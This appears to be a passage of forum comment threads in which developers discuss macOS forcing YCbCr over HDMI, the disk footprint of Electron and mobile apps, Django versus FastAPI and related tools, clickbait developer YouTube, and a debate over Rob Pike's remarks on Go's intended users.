My current axe to grind: on M-series Macs, when I plug a monitor in via HDMI, it uses YCbCr instead of RGB, giving the monitor this pervasive hazy tint that is perceptible even with Night Shift on.
I have to use BetterDisplay to force it to RGB every time I connect to the monitor. This should be something I can set on a per-monitor basis.
Unfortunately I can’t use DisplayPort because my Caldigit TS3 Plus seems to have difficulty passing DP1.2 signals over when variable refresh rates are selected. And guess what macOS likes to default to there, as well?
I believe it defaults to Y′CbCr only when a 10 bpc mode becomes available thanks to it, even if that means dropping down to 4:2:2 subsampling. Because 10 > 8, of course.
This happens because of bandwidth restrictions: RGB (or Y′CbCr 4:4:4) uses 3×N bpp while 4:2:2 uses 2×N bpp. So 20 bpp < 24 bpp, and it’s “10-bit”, so macOS considers it a win-win.
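A back-of-the-envelope sketch of that arithmetic in Python (my numbers, ignoring blanking intervals and link overhead, so treat them as illustrative only):

```python
# Uncompressed video bandwidth: 4:4:4 (RGB or Y'CbCr) carries 3 samples per
# pixel; 4:2:2 averages 2 samples per pixel.
def gbit_per_s(w, h, hz, bits_per_component, samples_per_pixel):
    return w * h * hz * bits_per_component * samples_per_pixel / 1e9

print(gbit_per_s(3840, 2160, 60, 8, 3))   # RGB 8 bpc:       ~11.9 Gbit/s
print(gbit_per_s(3840, 2160, 60, 10, 3))  # RGB 10 bpc:      ~14.9 Gbit/s
print(gbit_per_s(3840, 2160, 60, 10, 2))  # 4:2:2 at 10 bpc: ~10.0 Gbit/s
```

On a link with roughly HDMI 2.0’s ~14.4 Gbit/s of effective bandwidth, the 10 bpc RGB mode is the one that stops fitting while 10 bpc 4:2:2 still does, which matches the behaviour described above.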
Thank you for pointing out BetterDisplay. I thought that’s just how HDMI displays looked on M-series Macs under macOS.
It will join the rest of the applications I have to use to make macOS usable. (AutoRaise, Caffeine, MiddleClick, RDM, Rectangle, SaneSideButtons/SensibleSideButtons)
Can’t forget how each app has its own updater, and that those updaters will steal focus or at least have the anxiety-inducing bounce animation. (How does macOS not have focus stealing prevention?)
The bounce can be disabled in accessibility settings. Also, AutoRaise can prevent focus stealing by forcing the window that the mouse is over to remain focused. Ideally, auto-updaters and add-on apps would not be required, but that’s why I use Linux outside of work.
Fascinating, I have 2 different models of 27” Dells, one via HDMI and one via HDMI in a small USB-C dock.
Both seem to be YCbCr (according to their OSDs) and I haven’t noticed anything wrong. I suppose they wouldn’t switch when I have them on the other computer, but it’s mDP and… not sure, DP probably
I have to use BetterDisplay to force it to RGB every time I connect to the monitor.
What drove me away during my last foray into the macOS ecosystem was the beginnings of this trend. I had last used then-still-named OS X during Snow Leopard and Lion, and when I gave it a go in 2014 (I think Yosemite?), I found a bunch of my standard setup tweaks and tasks were no longer available unless you paid for some extra app store tool.
A bunch of my personal preferences went from being configurable options in a menu, to being hidden settings you could only enable via CLI, to requiring a third-party app I needed to install (and often to pay for). I am sad to hear that the trend has not abated.
Claude is still my default, but if I have a problem that might benefit from “reasoning” about it - things like debugging a complex bug caused by code across multiple different files - I’ll try o1 or R1 and see if they can spot something that Claude doesn’t.
Slightly longer: the post asserts 4 main points. The author fails to adequately defend any of them. I feel that the 3 main points he tries to defend all fail. I feel all 4 objections are valid, and I disagree with all of his attempted defences.
This is the attitude that enables enshittification: “most users” will keep using our product despite us degrading the experience.
The dev version of this: “$POPULAR_FRAMEWORK is popular, and it must be popular because it is good, therefore $POPULAR_FRAMEWORK is good.” If you lack the imagination to see literally any other way to implement it, the experience of using something else, or lack the ability to assess the tradeoffs, it is easy to fall into this trap. It is much cognitively cheaper to outsource the hard work of critically evaluating technology to other people. The problem arises when most everyone does the same thing, creating a closed system that stalls out at local maxima. (cough)
Think about the prevailing assessment that dominated web discourse in the early 2010s: static types were worthless boilerplate. And then TS flipped that opinion around, to where people swear by static types now. That collective everyone changed their mind, which was good. But it should also instill doubt in those paying attention as to whether that collective everyone’s takes are as infallible as they purport to be.
I totally agree. Specifically, people arguing over bundle size is ridiculous when compared to the amount of data we stream on a daily basis. People complain that a website requires 10mb of JS to run but ignore the GBs in python libs required to run an LLM – and that’s ignoring the model weights themselves.
There’s a reason why Electron continues to dominate modern desktop apps and it’s pride that is clouding our collective judgement.
As someone who complains about Electron bundle size, I don’t think the argument of how much data we stream makes sense.
My ISP doesn’t impose a data cap—I’m not worried about the download size. However, my disk does have a fixed capacity.
Take the Element desktop app (which uses Electron) for example; on macOS the bundle is 600 MB. That is insane. There is no reason a chat app needs to be that large, and to add insult to injury, the UX and performance is far worse than if it were a native client or a Qt-based application.
Take the Element desktop app (which uses Electron) for example; on macOS the bundle is 600 MB. That is insane. There is no reason a chat app needs to be that large, and to add insult to injury, the UX and performance is far worse than if it were a native client or a Qt-based application.
Is it because it uses Electron that the bundle size is so large? Or could it be due to the developer not taking any care with the bundle size?
Offhand I think a copy of Electron or CEF is about ~120-150MB in 2025, so the whole bundle being 600MB isn’t entirely explained by just the presence of that.
Hm. I may be looking at a compressed number? My source for this is that when the five or so different Electron-or-CEF based apps that I use on Windows update themselves regularly, each of them does a suspiciously similar 120MB-150MB download each time.
I don’t think the streaming data comparison makes sense. I don’t like giant electron bundles because they take up valuable disk space. No matter how much I stream my disk utilisation remains roughly the same.
Interesting, I don’t think I’ve ever heard this complaint before. I’m curious, why is physical disk space a problem for you?
Also “giant” at 100mb is a surprising claim but I’m used to games that reach 100gb+. That feels giant to me so we are orders of magnitude different on our definitions.
Also, the problem of disk space and memory capacity becomes worse when we consider the recent trend of non-upgradable/non-expandable disk and memory in laptops. Then the money really counts.
Modern software dev tooling seems to devolve to copies of copies of things (Docker, Electron) in the name of standardizing and streamlining the dev process. This is a good goal, but, hope you shelled out for the 1TB SSD!
I believe @Loup-Vaillant was referring to 3D eye candy, which I think you know is different from the Electron eye candy people are referring to in other threads.
A primary purpose of games is often to show eye candy. In other words, sure games use more disk space, but the ratio of disk space actually used / disk space inherently required by the problem space is dramatically lower in games than in Electron apps. Context matters.
I care because my phone has limited storage. I’m at a point where I can’t install more apps because they’re so unnecessarily huge. When apps take up more space than personal files… it really does suck.
And many phones don’t have expandable storage via sdcard either, so it’s eWaste to upgrade. And some builds of Android don’t allow apps to be installed on external storage either.
Native libraries amortize this storage cost via sharing, and it still matters today.
Does Electron run on phones? I had no idea, and I can’t find much on their site except info about submitting to the macOS App Store, which is different to the iOS App Store.
Well, Electron doesn’t run on your phone, and Apple doesn’t let apps ship custom browser engines even if they did. Native phone apps are still frequently 100mb+ using the native system libraries.
It’s not Electron but often React Native, and other web-based frameworks.
There’s definitely some bloated native apps, but the minimum size is usually larger for the web-based ones. Just shipping code as text, even if minified, is a lot of overhead.
Offhand I think React Native’s overhead for a “Hello world” app is about 4MB on iOS and about 10MB on Android, though you have to turn on some build system features for Android or you’ll see a ~25MB apk.
Just shipping code as text, even if minified, is a lot of overhead.
I am not convinced of this in either direction. Can you cite anything, please? My recollection is uncertain, but I think I’ve seen adding a line of source code to a C program produce object code that grew by more bytes than the length of the added source line. And C is a PL which tends towards small object code size, and that’s without gzipping the source code or anything.
I don’t have numbers but I believe on average machine code has higher information density than the textual representation, even if you minify that text.
So if you take a C program and compile it, generally the binary is smaller than the total text it is generated from. Again, I didn’t measure anything, but knowing a bit about how instructions are encoded makes this seem obvious to me. Optimizations can come into play, but I doubt it would change the outcome on average.
I’ve seen adding a line of source code to a C program produce object code that grew by more bytes than the length of the added source line
That’s different to what I’m claiming. I’d wager that change caused more machine code to be generated because before some of the text wasn’t used in the final program, i.e. was dead code or not included.
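For what it’s worth, rather than arguing from memory, here’s a rough way one could measure it (a hypothetical sketch; results will vary by compiler, flags, and the line you add, and .o files carry symbol/relocation overhead that a linked, stripped binary wouldn’t):

```python
# Compile the same C source with and without one extra function and compare
# how much the object file grows versus how many bytes of text were added.
import os
import subprocess
import tempfile

BASE = "int main(void){return 0;}\n"
EXTRA = "int add(int a,int b){return a+b;}\n"  # the "added line"

def object_size(source: str) -> int:
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "t.c")
        obj = os.path.join(d, "t.o")
        with open(src, "w") as f:
            f.write(source)
        subprocess.run(["cc", "-O2", "-c", src, "-o", obj], check=True)
        return os.path.getsize(obj)

growth = object_size(EXTRA + BASE) - object_size(BASE)
print(f"source grew by {len(EXTRA)} bytes, object file by {growth} bytes")
```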
Installed web apps don’t generally ship their code compressed AFAIK, that’s more when streaming them over the network, so I don’t think it’s really relevant for bundle size.
Installed web apps don’t generally ship their code compressed AFAIK, that’s more when streaming them over the network, so I don’t think it’s really relevant for bundle size.
IPA and APK files are both zip archives. I’m not certain about iOS but installed apps are stored compressed on Android phones.
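If anyone wants to check a specific app, the claim is easy to test from Python (the file name here is made up):

```python
# An .apk/.ipa is a zip archive: compare its on-disk size with the sum of
# the uncompressed sizes of its members.
import os
import zipfile

path = "app-release.apk"  # hypothetical file
with zipfile.ZipFile(path) as z:
    unpacked = sum(info.file_size for info in z.infolist())
print(f"archive: {os.path.getsize(path):,} bytes, unpacked: {unpacked:,} bytes")
```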
I’m not sure about APK, but IPAs are only used for distribution and are unpacked on install. Basically like a .deb, or a DMG on macOS.
So AFAIK, it’s not relevant for disk space.
FWIW phone apps that embed HTML are using WebView (Android) or WKWebView (iOS). They are using the system web renderer. I don’t think anyone (except Firefox for Android) is bundling their own copy of a browser engine because I think it’s economically infeasible.
Funnily enough, there’s a level of speculation that one of the cited examples (Call of Duty games) is large specifically to make storage crunch a thing. You already play Call of Duty; do you really want to delete our 300GB game, and then have to download it again later, just to play other games?
Don’t choose based on hype, choose based on your project requirements and the kind of skills you want to develop over time.
Learn Django and FastAPI. Also, learn three more. Learn that weird new thing that your friend at work keeps mentioning, and learn the up-and-comer you’ve seen make headlines each week. You don’t need to become an expert in all of them, but you can only make the choice “based on your project requirements” if you know what the options are at decision time.
One tool is a screwdriver and one is a can opener. Learn both.
This mentality works if you have a lot of free time. I think you should learn a thing deeply first before just spreading yourself like butter on a freshly toasted bagel. Otherwise you’re just noticing surface level differences and not differences in architectures and design decisions.
Learning one thing well is worth it. Once you start hating some of its decisions, you can try something else, and find that you hate it for different decisions it made. :)
It “bothers” me a bit that alternatives to the Django admin are so scarce.
Also, because SPAs have a huge mindshare, most of the interesting work is happening in that space. Traditional server-side rendered apps, while having some resurgence thanks to HTMX and similar frameworks… well, there are established players, but it doesn’t feel like there’s much innovation. Perhaps traditional frameworks are stable and don’t really need more than slow evolution.
And the rift is a huge issue. I see there’s stuff to build using server-side rendering, but even though I don’t like SPA development, there’s plenty of stuff that is better as an SPA! (And we also lack more competition in Electron-style apps!)
Myself, when I look at FastAPI, I like it a lot. But most things I want to do, in my head, fit server-side rendering better, and I kinda always need something like the admin, so I still turn to Django frequently.
There’s something fundamental in the difference between a frontend dev who needs a backend and a backend dev who needs an SSR UI, and you see it reflected in the frameworks.
Frontend-oriented frameworks put most of their skill points in making sure that frontend dev is cozy, often with really nice live reloading via Vite. Full-stack frameworks say, “here’s a templating language.” Frontend frameworks say, “here’s the bare minimum needed to handle a web request.” Some full-stack frameworks get deep into the weeds with domain modeling and let you elegantly model a domain far beyond simple HTTP handlers. The worst situation to be in is when you can appreciate what both worlds offer you, as very few options exist that give you all the benefits here.
Personally, I do UI dev in Astro with the hyper fast hot reload, and move it over to templates for SSR. Domain modeling is too important to give up for me. I find I lose a lot of time trying to recreate things that you get for free in full stack frameworks.
But there’s a real opportunity for someone to cross the streams here. It’d probably have to be in TS, which isn’t my favorite language, or someone can figure out how to use React/Vue/Svelte components for SSR rendering.
Myself, when I look at FastAPI, I like it a lot. But most things I want to do, in my head, fit server-side rendering better, and I kinda always need something like the admin, so I still turn to Django frequently.
You might be interested in django-ninja. It feels more like FastAPI than DRF does, uses pydantic, and lets you keep the batteries you like (including admin).
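For anyone who hasn’t seen it, a minimal sketch of the shape (endpoint and schema names are mine, not from any real project):

```python
# api.py -- django-ninja sits inside a normal Django project, so the ORM,
# auth, and admin keep working alongside the typed API.
from ninja import NinjaAPI, Schema

api = NinjaAPI()

class ItemIn(Schema):  # pydantic-style request validation, much like FastAPI
    name: str
    price: float

@api.post("/items")
def create_item(request, payload: ItemIn):
    # payload arrives validated; this is where you'd touch your Django models
    return {"name": payload.name, "price": payload.price}

# urls.py would mount it with: path("api/", api.urls)
```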
It sounds like we might do similar things, then. I rarely need an API; when I do it’s just for one or two things, not for all of my UI.
I’ve used HTMX regularly for a little while now, including in production. In my production use of it, I used django-template-partials, and it’s pretty nice. I’ve been experimenting with cotton in some prototyping, and think I’ll probably use that in the future where I’m currently using template partials.
I worked through the hypermedia systems book using django and HTMX in public, and found the exercise extremely useful. I wrote about my work here. The nice thing is that the workflow for something enhanced with HTMX is so similar to the plain-old-templates I’m used to.
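To give a flavour of that workflow, here’s a sketch from memory (view, template, and model names are invented; check the django-template-partials docs for the exact syntax):

```python
# views.py -- one template serves both the full page and the HTMX fragment.
# django-template-partials lets you render a single {% partialdef %} block
# by appending "#partial-name" to the template name.
from django.shortcuts import render
from .models import Task  # hypothetical model

def task_list(request):
    template = "tasks.html"
    if request.headers.get("HX-Request"):   # header HTMX sets on its requests
        template = "tasks.html#task-rows"   # re-render just the fragment
    return render(request, template, {"tasks": Task.objects.all()})
```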
For exploratory programming, I have recently tried out NanoDjango a few times, and I really like it. It lets me keep all the admin goodness I like about django but really lowers the impedance for trying something out quickly. And its “convert” command turns things into a normal django project if I decide they need to have a longer useful life.
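From memory, the single-file shape looks something like this (double-check the NanoDjango docs; this is roughly the counter example from its README):

```python
# counter.py -- one file, but models and the Django admin stay available.
from django.db import models
from nanodjango import Django

app = Django()

@app.admin  # registers the model in the Django admin
class CountLog(models.Model):
    timestamp = models.DateTimeField(auto_now_add=True)

@app.route("/")
def count(request):
    CountLog.objects.create()
    return f"<p>Page loads: {CountLog.objects.count()}</p>"

# run it with:       nanodjango run counter.py
# outgrow it later:  nanodjango convert counter.py ./myproject
```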
When you mentioned that you liked the look of FastAPI, I was thinking about the API part. But NanoDjango gets at that low-impedance feeling for starting a project.
Huh, NanoDjango looks intriguing, I’ll look at it, thanks.
The last times I’ve dabbled with Django I had a few goes at trying to make the first-steps experience a bit smoother; like incorporating dj-database-url, uv, and a few other odds and ends that end up being boilerplate-ish for having an easy-to-deploy, smooth initial setup. Likely there’s a million other better approaches out there with more polish, but… it’s how we are.
The Django admin is a rapid CRUD framework with (primitive) change tracking and some authorization support.
This is not only hugely useful, but it even encourages you to store in the database stuff that you would otherwise hardcode in the source code.
It is not perfect by any means, but there’s very few things like it, and for many projects, it puts you one step ahead in productivity.
…
I have certainly switched some stuff to be based in source code and use a Git forge’s support for editing files via a web UI with code review for some purposes, so there’s a small overlap, but still a lot of things I do benefit from the admin.
Case in point; I wrote a small scraper to collect versions from upstream projects and their YunoHost package. I use a Django admin to maintain scraping exceptions. It’s great. I could edit a YAML via the forge web UI, or just with my local editor + git, but in this case, it works so much better.
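For the unfamiliar, the entire admin side of something like that scraper is roughly this much code (model and field names invented for illustration):

```python
# admin.py -- a few lines buy a full CRUD UI, with change history and
# per-user permissions, for the scraping-exceptions table.
from django.contrib import admin
from .models import ScrapeException  # hypothetical model

@admin.register(ScrapeException)
class ScrapeExceptionAdmin(admin.ModelAdmin):
    list_display = ("project", "reason", "updated_at")
    list_filter = ("reason",)
    search_fields = ("project",)
```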
Case in point; I wrote a small scraper to collect versions from upstream projects and their YunoHost package. I use a Django admin to maintain scraping exceptions. It’s great. I could edit a YAML via the forge web UI, or just with my local editor + git, but in this case, it works so much better.
I guess it’s a difference in opinion; I’d prefer something like that to be checked in and linted, or to have logic in the app itself to confirm exceptions are valid inputs.
It “bothers” me a bit that alternatives to the Django admin are so scarce.
I was looking for this in Nest and found a project half a decade unmaintained. There was a newfangled Rust framework that had this on its roadmap, kinda.
Most people say that given an OpenAPI spec it should be ‘easy’ to create a generic web CRUD editor for it, but nobody seems to be bothered to build one that is usable.
Yes, the most brilliant minds of our generation are ignoring this problem. The “optimist” answer is that you cannot really make CRUD nicer than what it is. (E.g., there’s so much variation that CRUD frameworks will always have narrow use cases.)
I have written two CRUD frameworks. The first one got along quite far, with many sophisticated features, but it had some basic flaws. My second one has a stronger foundation, and indeed it still powers one personal app… but I never had the need to develop more features… so I still rely on Django for most things :(
Coming from Django I can’t emphasise how much of a step down this pile of crap is (but that is the TS/JS culture that this is considered good and popular): https://nestjs.com
The YouTube channel here seems to be a person who needs to be dramatic for view reasons. I think the actual content, and the position of the Ghostty author here on this topic, is pretty mild.
An actual bit from the video:
Guest: “…I don’t know, I’m questioning everything about Go’s place in the stack because […reasonable remarks about design tradeoffs…]”
Host: “I love that you not only did you just wreck Go […]”
Aside… In the new year I’ve started reflexively marking videos from channels I follow as “not interested” when the title is clickbait, versus a succinct synopsis of what the video is about. I feel like clickbait and sensationalism on YouTube is out of control, even among my somewhat curated list of subscribed channels.
This is why I can’t stand almost any developer content on YouTube and similar platforms. They’re way too surface-level, weirdly obsessed with the inane horse race of finding the “best” developer tooling, and clickbait-y to a laughable degree. I have >20 years of experience; I’m not interested in watching someone blather on about why Go sucks when that time could be spent talking about the actual craft of building things.
But, no, instead we get an avalanche of beginner-level content that lacks any sort of seriousness.
This is why I really like the “Developer Voices” channel. Great host, calm and knowledgeable. Interesting guests and topics. Check it out if you don’t know it yet.
I’m in a similar boat. Have you found any decent channels that aren’t noob splooge? Sometimes I’ll watch Asahi Lina, but I haven’t found anything else that’s about getting stuff done. Also, non-OS topics would be nice additions as well.
7 (7!) years ago LTT made a video about why their thumbnails are so… off-putting, and it essentially boiled down to “don’t hate the player; hate the game”. YouTube rewards that kind of content. There’s a reason why nearly every popular video these days is some variant of “I spent 50 HOURS writing C++” with the thumbnail having a guy throwing up. If your livelihood depends on YouTube, you’re leaving money on the table by not doing that.
It’s not just “Youtube rewards it”, it’s that viewers support it. It’s a tiny, vocal minority of people who reject those thumbnails. The vaaaaast majority of viewers see them and click.
I don’t think you can make a definitive statement either way because YouTube has its thumb on the scales. Their algorithm boosts videos on factors other than just viewer click through or retention rates (this has also been a source of many superstitions held by YouTubers in the past) and the way the thumbnail, title and content metas have evolved make me skeptical that viewers as a whole support it.
What is the alternative? That they look at the image and go “does this person make a dumb face”? Or like “there’s lots of colors”? I think the simplest explanation is that people click on the videos a lot.
…or it’s just that both negative and positive are tiny slices compared to neutrals but the negative is slightly smaller than the positive.
(I use thumbnails and titles to evaluate whether to block a channel for being too clickbait-y or I’d use DeArrow to get rid of the annoyance on the “necessary evil”-level ones.)
I am quite happy to differ in opinion to someone who says ‘great content’ unironically. Anyway your response is obviously a straw man, I’m not telling Chopin to stop composing for a living.
Your personal distaste for modern culture does not make it any higher or lower than Chopin, nor does it invalidate the fact that the people who make it have every right to make a living off of it.
They literally don’t have a right to make a living from YouTube; this is exactly the problem. YouTube can pull the plug and demonetise them at any second and on the slightest whim, and they have absolutely no recourse. This is why relying on it to make a living is a poor choice. You couldn’t be more diametrically wrong if you tried. You have also once again made a straw man with the nonsense you invented about what I think about modern culture.
How’s that any different from the state of the media industry at any point in history? People have lost their careers for any reason in the past. Even if you consider tech or any other field, you’re always building a career on top of something else. YouTube has done more to let anyone make a living off content than any other stage in history, saying you’re choosing poorly to make videos for YouTube is stupid.
You have also once again made a straw man with the nonsense you invented about what I think about modern culture
You’re the one who brought it up:
I am quite happy to differ in opinion to someone who says ‘great content’ unironically
Isn’t this kind of a rigid take? Why is depending on youtube a poor choice? For a lot of people, I would assume it’s that or working at a fast-food restaurant.
Whether that’s a good long-term strategy, or a benefit to humanity is a different discussion, but it doesn’t have to necessarily be a poor choice.
Not really?
I mean sure if you’ve got like 1000 views a video then maybe your livelihood depending on YouTube is a poor choice.
There’s other factors that come into this, but if you’ve got millions of views and you’ve got sponsors you do ad-reads for money/affiliate links then maybe you’ll be making enough to actually “choose” YouTube as your main source of income without it being a poor choice (and it takes a lot of effort to reach that point in the first place).
We’ve been seeing this more and more. You can, and people definitely do, make careers out of YouTube and “playing the game” is essential to that.
Heh - I had guessed who the host would be based on your comment before I even checked. He’s very much a Content Creator (with all the pandering and engagement-hacking that implies). Best avoided.
Your “ghostty author” literally built a multibillion-dollar company writing Go for over a decade, so I’m pretty sure his opinion is not a random internet hot take.
Yup. He was generally complimentary of Go in the interview. He just doesn’t want to use it or look at it at this point in his life. Since the Lobsters community has quite an anomalous Go skew, I’m not surprised that this lack of positivity about Go would be automatically unpopular here.
And of course the title was click-baity – but what can we expect from an ad-revenue-driven talk show?
I was able to get the incremental re-builds down to 3-5 seconds on a 20kloc project with a fat stack of dependencies which has been good enough given most of that is link time for a native binary and a wasm payload. cargo check via rust-analyzer in my editor is faster and does enough for my interactive workflow most of the time.
Don’t be a drama queen ;-) You can, all you want. That’s what most people do.
The host actually really likes Go, and so does the guest. He built an entire company where Go was the primary (only?) language used. It is only natural to ask him why he picked Zig over Go for creating Ghostty, and it is only natural that the answer will contrast the two.
Still rocking an iPhone 12 mini. The modern web can be pretty brutal on it at times: pages crashing, browser freezing for 10s at a time. It has honestly curtailed my web use on the go significantly, so I’m mostly okay with it on the whole.
Most things I absolutely need I can get an app for that will run better usually. The only real issue is the small screen size is obviously not being designed for anymore, and that’s becoming more of an issue.
I didn’t realize how many apps were essentially web applications until I enabled iOS lockdown mode. Suddenly I was having to add exceptions left and right for chat apps, my notes app, my Bible app, etc.
But even web-powered apps do seem snappier than most websites. Maybe they’re loading less advertising/analytics code on the fly?
Most things I absolutely need I can get an app for that will run better usually. The only real issue is the small screen size is obviously not being designed for anymore, and that’s becoming more of an issue.
I’m on a 2022 iPhone SE, and feel the same way. (My screen may be a bit smaller than yours?) The device is plenty fast, but it’s becoming increasingly clear that neither web designers nor app developers test much if at all on the screen size, and it can be impossible to access important controls.
TBH, I would cheerfully carry a flip phone with the ability to let other devices tether to it for data connectivity. Almost any time I really care about using the web, I have a tablet or a laptop in a bag nearby. A thing that I could talk on as needed and that could supply GPS and data to another thing in my bag would really be a sweet spot for me.
That is exactly the kind of thing I’d like. I’d probably need to wait for the 5G version, given the 4G signal strength in a few of the places I tend to use data.
In the most charitable interpretation, it’s only a restatement of something from the article:
Elsewhere Pike talks about the thousands of engineers he was targeting, in his usual modest, subtle way:
The key point here is our programmers are Googlers, they’re not researchers. They’re not capable of understanding a brilliant language.
So you could even argue that “Go being great if you’re an amateur with no taste” was an explicit design goal, and perhaps we should ask Rob Pike to be better.
Ah, the good “everyone who disagrees is dumb and uncivilized” argument.
As we all know, Pike, Thompson, Griesemer, Cox, et al. have no idea what they’re doing. [/irony]
It’s fine to disagree on things, have different opinions and criticism. Heck, that’s how people decide what language they wanna use. But the reason there are more than a handful of languages with different designs is probably not that everyone else is dumber than you.
And should “amateur” in fact not be meant as an insult, then the argument essentially becomes “to use zig you have to be smart, and not make mistakes”, which, judging by your other comments, doesn’t seem to be your opinion either.
Trying to give you the benefit of the doubt here, since other than me personally not liking certain design choices I think Zig seems like a great project overall.
Ah, the good “everyone who disagrees is dumb and uncivilized” argument.
Go was explicitly designed for fresh university graduates at google, thus, amateurs. And as Pike himself says, quoted in the linked article, for people with no taste (“They’re not capable of understanding a brilliant language”). Andrew’s assessment is completely fair.
That Pike quote has been used as a stick to beat him with since 2012. I have a note about it.
It’s from a talk, so likely extemporised.
Here’s the full quote:
The key point here is our programmers are Googlers, they’re not researchers. They’re typically, fairly young, fresh out of school, probably learned Java, maybe learned C or C++, probably learned Python. They’re not capable of understanding a brilliant language but we want to use them to build good software. So, the language that we give them has to be easy for them to understand and easy to adopt.
It must be familiar, roughly C-like. Programmers working at Google are early in their careers and are most familiar with procedural languages, particularly from the C family. The need to get programmers productive quickly in a new language means that the language cannot be too radical.
I think it’s pejorative to state that recent CS graduates who have started working at Google before 2012 “have no taste”. No experience at writing production software at scale, sure. But software development is so much more than language.
I haven’t watched the talk, so I don’t know if the term “brilliant language” is used semi-ironically. Neither C, Java, nor COBOL for that matter are considered “brilliant”, but they have been used to write a lot of software. There’s a law of large numbers in play when it comes to writing software at scale which means that you necessarily have to cater to the lowest common denominator of developers, which even at Google at its prime was probably lower than the average commenter here ;)
I am fully in agreement that Golang was probably a great fit for Google, and maybe still is. Its popularity outside Google is probably due to good marketing, “if we copy Google we too will succeed”, and a genuine demand for a “C-like with garbage collection and concurrency”.
For outside-Google use, that last part, “C-like with garbage collection”, is, I suggest, a big part of its appeal. If one is already aware of how to write reasonable C, it is a useful mechanism to have, and less risky for small to medium-sized companies than depending upon D.
If one has folks who are familiar with C, and a problem to tackle which does not require manual memory management, nor the tricky performance things C is often used for, then it seems an obvious option, without dragging in a lot of the pitfalls of C++ or the complexities of other languages. I’ve occasionally proposed it in such cases.
I have actually chosen to use Go for one project, specifically because of its good CSP support, as the problem domain lent itself to such a design approach. However, one had to be aware of certain risks: lack of immutable pointers for sends over channels, ensuring one nil’ed a pointer after sending (moving ownership), being wary of sending structs containing slices, avoiding accidental mutable captures when spawning goroutines from interior functions, etc.
Despite that it was still the easiest approach to sharing work on said program with others not familiar with the CSP approach. In many ways one can view Go as the Alef with a GC which Pike wanted Winterbottom to make, for CSP tasks it reasonably serves in that role. However it would (IMHO) be better if it had a few more of the issues I mention above addressed; that’ll have to wait for some future language.
As to general concurrency, I’ve seen a lot of Go written in a threads + mutex protecting structs style which one often sees in C and C++, so I suspect most people are not taking the effort to analyse in the CSP style, or more likely are simply unaware of it.
My point is that constantly quoting a 12-year-old remark as an anti-golang trope is lazy and borderline intellectually dishonest.
I think Rob Pike knows more about Google’s workforce than most of his detractors do - and that hiring a bright young person directly from university does not give you a seasoned software developer. I also believe that an appreciation for “brilliant languages” in relation to software development is something that is developed over time, at which time the person hired by Google is probably doing something more valuable to the company bottom line than writing code.
I don’t think it’s intellectually dishonest to bring up a rude and dismissive quote from one of the designers of golang stating that golang is a dumbed-down language because its target userbase is too stupid to understand a better language.
I disagree. Disliking a language because it has multiple technical issues, like others have pointed out in this thread and others, is defensible. Disliking it because its creator said something inappropriate is not.
Even the most generous reading I can muster for Pike’s infamous remarks is something like “we want new graduates with limited breadth and depth of experience to be able to make productive contributions without having to learn a lot of new stuff.” I think the criticism of Go that is pegged to Pike’s remarks is not dislike because of what he said, it’s that its deficiencies exist in part because of the design goals these remarks lay bare. The remarks provide evidence that Go’s design was targeted at novices (“amateurs with no taste”, if you like) from whom economic productivity is expected immediately, rather than professionals with an unbounded capacity for learning and independent interest in doing excellent work.
Maybe. I still think a bunch of nerds got really angry at Pike because they didn’t get jobs at Google back in the day despite being fluent in Haskell, and they will never forget nor forgive.
I have another reason to think Pike’s quote is unattractive: it’s devious rhetoric.
He indirectly acknowledges that Go lacks a bunch of good features, fair enough. But then he insinuates that that is because those features are hard to understand (require devs “capable of understanding a brilliant language”). That is wrong on the facts, at least in the case of sum types. It is also rude: he uses the word “brilliant” as a synonym for ‘hard to understand’. That is a ‘back-handed compliment’, which is another word for ‘insult’ in the brilliant English language ;-) .
As for its relevance to Go: sure, the quote is not enough to condemn Go. But it suggests the big mistake (nil) that Go’s designers did, in fact, go on to make. Which is why there is so much cause to quote it.
The context here is about how Go was designed. A quote from the creator of the language about how it was designed at a time when it was designed seems like the most appropriate thing possible to bring up.
I agree with your second paragraph, but I see no relation to the first one. The language was designed in a certain way for certain reasons. If that was yesterday or 12 years ago does not really matter when looking at the lifecycle of the typical programming language.
Even within Google, Java is significantly bigger/more used than Go, and frankly, I don’t see much difference in their design goals. I would even say that Java is a better “Go” than Go itself - it has better concurrency primitives, now has virtual threads, and is a very simple language with utmost care for backwards compatibility. And it is already over its growing pains (which one would think Go could have easily avoided by learning from them) - it is expressive, but not in the “redefine true to false” kind of dangerous way, has good enough generics, etc.
Also, all that development into Java’s GCs can really turn the tables in a naive performance comparison - sure, value types can make the life of the Go GC easier, but depending on workload it may not be enough to offset something like the beast G1GC is - especially in server environments where RAM is plentiful (and often have to be plentiful).
Hmm, that’s odd. Your note almost literally quotes [a Hacker News comment](https://news.ycombinator.com/item?id=18564643), right down to the truncated link text ending in ...; but the second link was introduced with the crucial words “And there are other hints on”, and those are missing.
Go was explicitly designed for fresh university graduates at google
What does “explicitly designed” mean in this context? This feels a lot like saying Python has explicitly designed as a teaching language and C explicitly for Unix, etc.
Also I’d argue that Go - despite Google - is a lot more in the tradition of Limbo, Alef and Newsqueak.
Google plus university students sounds a lot more like Python and Java, languages already used a lot by Google.
Anyways, let’s stick to the criticism. Let’s take Limbo. Limbo is rather close to Go. Just quite a bit more niche for many reasons. However to the best of my knowledge it wasn’t “explicitly designed for fresh university graduates”, certainly not at Google which didn’t exist at the time.
Is that also a language for amateurs with no taste?
I mostly ask because the specific context, “people working at Google”, under which it was created seems to be overly present in the argument, yet we talk about it largely as people who didn’t work at Google. Also, that Go is largely used by amateurs (compared to Python, JavaScript, etc.) seems at least debatable.
And to be clear: I hate the fact that Google seemingly at some point decided to exert a lot more control. Honestly, I even dislike the fact that Go was created at Google. The main reason I got interested in the language originally was that I tend to like software designed by the Plan 9 crowd. The fact that it was less niche - and that’s Google’s “fault” - helped, as did the promised stability, in a time where programming languages seem to be designed largely like fashion: one just adds whatever is currently en vogue, piling up “old ways of doing things” until enough cruft is accumulated for everyone to leave the sinking ship of “sounds good on paper” ideas, and code bases where you can tell when they were written by which feature was new and hip at the time. See Java’s OO features, or JavaScript’s million ways to write simple loops. Pike’s talks on how Go was essentially finished, with only generics remaining[1] and focus shifting to libraries, compiler, GC, etc., seemingly confirmed that. Then Pike got quiet and Google replaced the Go website with a heavily Google-branded one.
So in that sense I get where things come from. However, if you look at Go it’s also a clear next step from previous languages in the spirit of Alef, Newsqueak and Limbo. Channels exist in all of them and might be the thing that was copied the most. So that “awful, buggy concurrency primitive” has a history going back to the 80s and Go is currently the reason it’s been copied so much into other languages.
fresh university graduates at google, thus, amateurs
Why not say that then?
Wikipedia on amateur:
